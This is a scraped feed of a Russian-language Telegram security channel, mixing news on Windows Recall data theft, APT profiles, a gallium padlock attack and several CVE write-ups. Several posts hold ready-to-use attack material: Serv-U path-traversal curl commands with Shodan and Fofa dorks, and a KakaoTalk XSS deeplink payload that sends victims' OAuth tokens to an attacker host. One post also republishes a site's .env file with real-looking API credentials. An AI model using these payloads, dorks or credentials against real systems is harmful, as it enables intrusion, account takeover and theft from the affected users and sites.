Cybred
9.78K subscribers
402 photos
35 videos
100 files
611 links
Download Telegram
Пример использования анонсированной функции Recall, которая скоро появится в стабильных версиях Windows и будет включена по-умолчанию.

Все данные из менеджера паролей были распознаны с помощью OCR и теперь хранятся в локальной базе данных %LocalAppData%\CoreAIPlatform.00\UKP\{<UUID>}\ukg.db.

В стиллеры ее кражу добавят до официального релиза
Cybred
Пример использования анонсированной функции Recall, которая скоро появится в стабильных версиях Windows и будет включена по-умолчанию. Все данные из менеджера паролей были распознаны с помощью OCR и теперь хранятся в локальной базе данных %LocalAppData%\…
TotalRecall

Утилита для поиска, извлечения и анализа всех собранных технологией Recall-данных. На выходе отдает снимки и текст, который удалось распознать, включая историю браузера, переписки, пароли и номера кредитных карт.

Принцип работы сводится к тому, чтобы собрать файлы из ImageStore, добавить к ним расширение .jpg, и получить скриншоты. Все остальное хранится плеинтекстом в SQLite.

Поддерживает фильтры по дате и ключевым словам, после выполнения работы создается готовый отчет.
This media is not supported in your browser
VIEW IN TELEGRAM
🔐 Lockpicking без отмычек, алмазных сверл и термита.

Хотите надежно защитить свои вещи от кражи? Не сомневайтесь! С нашими навесными замками ваши вещи останутся там, где они должны быть.

гласит надпись на сайте компании ABUS, которая производит "надежные" замки.

Производят они их из собственный сплава, Titalium, о котором никто и никогда раньше не слышал, но который подозрительно созвучен и по написанию похож на титан, Titanium.

Очевидно, сделано это, чтобы обмануть покупателя. Вопреки влажным фантазиям, стоит зайти на их лендинг и сразу становится понятно, что так они назвали обычный алюминий.
Titalium основан на легком и прочном алюминиевом сплаве. В своих замках ABUS уделяет особое внимание максимальной устойчивости и малому весу.


Как бы они не хвалили его прочность, капля галлия превращает навесной замок из алюминия в подобие сухой глины, — благодаря реакции двух металлов, он становится настолько хрупким, что его можно раскрошить руками.

📹 Gallium vs. Titalium - Abus Padlock Meets a Gruesome End
APT Profiles

Краткое саммари в красивой обложке про APT из Китая, Ирана, США, России и Северной Кореи.

На каждую из угроз — свой файл с подробным, но небольшим описанием на несколько страниц.

Можно взглянуть и сразу понять:

какие страны они атакуют
что у них есть в арсенале
самые крупные инциденты

У Беларуси, как выяснилось, тоже есть собственная группировка, — UNC1151. Но здесь она определена в категорию российской, поскольку является проксей, координируемой генералами ГРУ из России.

Довольно удобно, если вы интересуетесь только скоупом этих стран, но карточек пока маловато.
Взлом провайдера или как я получил доступ к миллионам устройств

Есть такая спецификация, TR-069 или CPE WAN. С помощью нее провайдер из специальной админки может отправить клиенту любой конфиг на его роутер.

Она не является священным граалем, а доступ к ней имеют тысячи "специалистов" техподдержки для помощи клиентам.

Попасть в админку = контролировать всех клиентов провайдера, а вместе с тем и перепрошить любой роутер.

Герой статьи, Сэм Карри, однажды обнаружил, что, когда он делает curl-запрос на AWS-сервер с собственного ПК, то спустя 10 секунд на этот же сервер приходил еще один точно такой же запрос, но уже с другого IP.

И это повторялось снова и снова.

Немного раскопав глубже, выяснилось, что кто-то встал между ним и провайдером и, вероятно, реализовал сценарий, о котором я писал в начале поста.

Вооружившись Burp'ом, Сэм смог повторить полный путь злоумышленника и повторно взломал провайдера, а вместе с тем получил доступ ко всем его клиентам, включая FBI.
Ищем самого разыскиваемого главаря банды, награда — $2 000 000

На фото — главарь банды Kraze Baryé, которого разыскивает ФБР. Он обвиняется в убийстве нескольких полицейских и многочисленных похищениях гаитянских миссионеров.

В это сложно поверить, но сегодня он входит в топ-10 самых разыскиваемых преступников в мире. За информацию, ведущую к его поимке, правоохранители обещают вознаграждение в размере до 2 миллионов долларов.

В этой статье, с помощью Google Earth и ориентировании на местности, мы найдем место, где он скрывается вместе со своими сообщниками.
This media is not supported in your browser
VIEW IN TELEGRAM
Hunt3r Kill3rs and the Italian Critical Infrastructure risks

Иранские школьники, которых называют себя Cyber Av3ngers APT, мимикрируют под россиян, и ломают израильские ПЛК Unitronics.

В своих сообщениях на ломаном русском они рассказывают о том, как отключают водоочистные сооружения и другую критическую инфраструктуру, заявляя, что "атакуют Европу и НАТО за их преступления".

Помимо того, что у Unitronics отключена аутентификация по-умолчанию, так еще и недавно исследователи из Team 82 нашли 8 уязвимостей, цепочка из которых позволяет выполнить код удаленно в обход аутентификации (на случай, если ее все-таки кто-нибудь не забудет включить).

Зачем к ним открывать доступ из интернета — загадка. Но, как показывает Shodan, таких устройств действительно много (пора закрывать и обновляться). Исследование — тут,
https://freetrumpknife.com/.env

APP_NAME=Trump
APP_ENV=local
APP_DEBUG=false
APP_URL=https://freetrumpknife.com

API_USER=gunnergear.api
API_PASS=v95E*JfVEq1^aiY!


За наводку спасибо @ld_anarchy
Cybred
CVE-2024-25153: Remote Code Execution in Fortra FileCatalyst Третий критический баг за последний год в продуктах Fortra, они же разработчики Cobalt Strike. С помощью анонимного доступа в веб-админке FileCatalyst Workflow можно залить JSP-шелл в директорию…
CVE-2024-28995 PoC and Bulk Scanner

У SolarWinds попытка в безопасный корпоративный файлообменник с первого раза тоже провалилась.

Ранее я писал о критичной RCE в софте от Fortra.

Path Traversal в SolarWinds Serv-U.

SQLite с путями к файлам
curl -i -k --path-as-is https://192.168.86.43/?InternalDir=\..\Shares^&InternalFile=Serv-U.FileShares --output Serv-U.FileShares


Прочесть нужный
curl -i -k --path-as-is https://192.168.86.43/?InternalDir=\..\..\..\..\testdomain\7\PzhW3v7W^&InternalFile=secrets.txt


Shodan:
product:"Rhinosoft Serv-U httpd"
"Serv-U FTP Server"

Fofa: app="SolarWinds-Serv-U-FTP"

Исследование https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
Forwarded from OFFZONE
This media is not supported in your browser
VIEW IN TELEGRAM
®️ Запускаем call for papers!

Пятый OFFZONE пройдет 22–23 августа в Москве, в Культурном центре ЗИЛ.

В этом году у нас еще больше зон для выступлений: добавились AI.Zone и Threat.Zone.
Ждем доклады на самые разные темы: open-source, применение AI/ML в кибербезопасности, уязвимости в парсерах, пентест Wi-Fi и не только. Не бойтесь предложить что-то свое :)

Спикеры, которые пройдут отбор, получат: бесплатные проходки на конфу и Speaker party, наш мерч, а также другие плюшки в зависимости от зоны.

Присылайте заявки на доклады до 12 июля. 

Узнать больше и подать заявку
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
1-click Exploit in South Korea's biggest mobile chat app

Account Takeover в самом популярном у корейцев мессенджере KakaoTalk.

Когда открывается диплинк, в него отправляется OAuth-токен пользователя, но только если домен доверенный, — проблема, и вот как она решается.

1. Находим XSS на домене из белого списка с помощью дорки:
site:*.kakao.com inurl:search -site:developers.kakao.com -site:devtalk.kakao.com


2. Отправляем не подозревающему собеседнику ссылку на свой сайт evil.com, где должен быть размещен следующий JS-код с XSS:
location.href = kakaotalk://buy/auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/Q24620753380/q:"><img src=x onerror="document.location=atob('aHR0cDovLzE5Mi4xNjguMTc4LjIwOjU1NTUv');">


Он откроет вебвью, приложение отправит OAuth-токен на домен из белого списка и выполнит XSS с редиректом и токеном на сайт хакера.

Баг был отправлен в 2023 году, а выплата составила $0, потому что владельцы приложения выплачивают награды только соотечественникам ¯\_(ツ)_/¯
Forwarded from vx-underground
Families that commit state-sponsored-cyber-espionage stay together ❤️

Father: Tim Vakhaevich Stigal, wanted by the United States Secret Service

Son: Amin Timovich Stigal, wanted by the United States Federal Bureau of Investigation
Element Android CVE-2024-26131, CVE-2024-26132 - Never Take Intents From Strangers

Экспорт неэкспортируемого из клиента Element.

Интент — способ, с помощью которых приложения общаются друг с другом. Например, когда одно приложение хочет открыть камеру, оно отправляет соответствующее "намерение".

Существуют неэкспортируемые интенты, которые используются только внутри приложения, и не могут быть вызваны из вне. Как правило, они более критичны и могут выполнять разные действия, включая смену пароля, работу с платежами и многое другое.

В Element была найдена уязвимость Intent Redirection, с помощью которой можно было сменить PIN-код на входе в приложение и получить доступ к внутренним файлам.

1. В MainActivity приложения был код, который обрабатывал Extra параметр в полученном Intent:
if (intent.hasExtra(EXTRA_NEXT_INTENT)) {
val nextIntent = intent.getParcelableExtraCompat<Intent>(EXTRA_NEXT_INTENT)
startIntentAndFinish(nextIntent)
}


2. Этот код извлекал вложенный Intent из Extra параметра и запускал его без дополнительных проверок.

3. Проблема заключалась в том, что MainActivity была экспортирована (доступна для вызова из других приложений), а запуск вложенного Intent происходил уже от имени самого Element.

Третье приложение => экспортируемый интент => неэкспортируемый интент

Благодаря этому можно было вызвать любой интент, который существовал в приложении, включая неэкспортируемые: на смену пин-кода, открытие вебвью, и получение файлов, которые были отправлены внутри.
Breaking Custom Encryption Using Frida (Mobile Application Pentesting)

Обычно запросы, передаваемые от клиента к серверу, зашифрованы SSL/TLS и, перехватывая трафик с помощью Burp или любого другого прокси с импортом сертификата на клиенте, мы видим содержимое в плеинтексте.

Однако некоторые приложения сами дополнительно шифруют тело запроса своими алгоритмами, в котором приходится разбираться. В этой статье приведен пример как раз такого случая с объяснением того, как научиться расшифровать трафик на ходу, используя реверс-инжиниринг и Frida.

Understanding Encrypted Requests in Mobile Apps
Creating a Frida script
Step-by-Step Guide to Decrypting Data Using Frida
Conclusion: The Impact of Dynamic Instrumentation
Recommendations for Developers